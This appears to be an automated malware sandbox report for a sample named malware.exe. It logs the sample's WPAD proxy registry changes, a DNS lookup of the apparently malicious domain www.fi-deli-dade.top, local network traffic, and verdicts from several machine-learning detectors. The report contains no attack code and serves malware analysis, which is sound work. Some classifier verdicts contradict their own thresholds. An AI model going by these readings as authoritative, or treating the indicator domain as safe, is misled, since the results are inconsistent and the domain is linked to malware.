19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionTime
19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecision
19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadNetworkName
19/2/2020 - 19:45:46.637Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDetectedUrl
19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
19/2/2020 - 19:45:46.637Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
19/2/2020 - 19:45:46.637Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
19/2/2020 - 19:45:46.637Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl

File Summary
Created
Identified: False cancel

Deleted
Identified: False cancel

Process Summary
Created
Identified: False cancel

Deleted
Identified: False cancel

Registry Summary
Proxy
Identified: False cancel

AutoRun
Identified: False cancel

Created
Identified: True check_circle

Deleted
Identified: True check_circle

Browsers
Identified: False cancel

Internet
Identified: True check_circle

Loading...

DNS
Query
computer localhost arrow_forward computer gateway:50273 code www.fi-deli-dade.top.
computer localhost arrow_forward computer gateway:DNS code www.fi-deli-dade.top.

Response

TCP
Info

UDP
Info
computer localhost:53 arrow_forward computer localhost:50273
computer localhost:50273 arrow_forward computer localhost:53
computer localhost:67 arrow_forward computer localhost:68
computer localhost:68 arrow_forward help_outline 255.255.255.255:67

HTTP
Info

Summary
DNS
True check_circle

TCP
False cancel

UDP
True check_circle

HTTP
False cancel

Results
BINARY
KNN (K=3, NFS-BRMalware)
confidence: 100.00%
suspicious: True check_circle

Decision Tree (NFS-BRMalware)
confidence: 100.00%
suspicious: True check_circle

SVC (Kernel=Linear, NFS-BRMalware)
confidence: 42.09%
suspicious: False cancel

MalConv (Ember: Raw Bytes, Threshold=0.5)
confidence: 97.89%
suspicious: True check_circle

Random Forest (100 estimators, NFS-BRMalware)
confidence: 66.00%
suspicious: True check_circle

Non-Negative MalConv (Ember: Raw Bytes, Threshold=0.35)
confidence: 91.08%
suspicious: False cancel

LightGDM (Ember: File Characteristics, Threshold=0.8336)
confidence: 59.57%
suspicious: False cancel

Add to Collection
Download